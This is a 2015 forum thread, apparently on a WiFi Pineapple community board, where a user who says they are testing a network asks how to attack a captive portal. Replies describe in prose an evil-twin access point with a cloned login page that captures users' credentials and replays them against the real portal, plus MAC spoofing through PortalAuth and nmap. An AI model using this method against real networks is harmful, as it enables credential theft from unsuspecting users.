nopenoway Posted May 29, 2015 Share Posted May 29, 2015 Hi All, Proud new owner of a Pineapple mk V here but fairly new user. I'm trying to test a network which is 'Open' and redirects any connected users to a captive portal (requiring AD logins). I'm wondering if it would be possible to perform an attack that does the following: wlan0 broadcasts 'TARGET_SSID' as Open with the same spoofed MAC address/ESSID etc Wlan1 connects to the 'legitimate' 'TARGET_SSID' and connects to the captive portal page When a user connects to the fake TARGET_SSID on wlan0 they should see a SSL-stripped version of the captive portal. Ideally, Once they login, the login should pass through WLAN1 to get internet/network access. If that's occurred successfully, the user should be allowed to browse as per usual while having a SSL-stripping attack performed. I'm not sure how to tie all these attacks together, from what i've been able to read so far, each of these attacks can happen but all happen individually. Could anyone point me in the direction of any guides etc that will help me do this or have any pointers? Many thanks, Quote Link to comment Share on other sites More sharing options...
digininja Posted May 29, 2015 Share Posted May 29, 2015 Captive portals usually work by allowing the MAC of the authenticated user through so they can use all the network services so the basic way you would do this attack would be: wlan0 puts up fake AP with fake login page. Don't pass through and don't sslstrip, just put up the page and ask for creds wlan1 associates with the real AP When a user sends creds to your fake portal it takes those and repeats the form POST (that is the most common auth method) against the real login page If the login is successful the MAC of wlan1 is then approved for use on the network Once you detect this success you take down the fake captive portal page and allow traffic to flow freely Automating this shouldn't be to hard if you can do a bit of coding Quote Link to comment Share on other sites More sharing options...
sud0nick Posted May 29, 2015 Share Posted May 29, 2015 May I suggest using PortalAuth to try cloning the portal? It will also use nmap to grab the MAC addresses of all other clients on the network if auto authentication fails so you can spoof your MAC. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.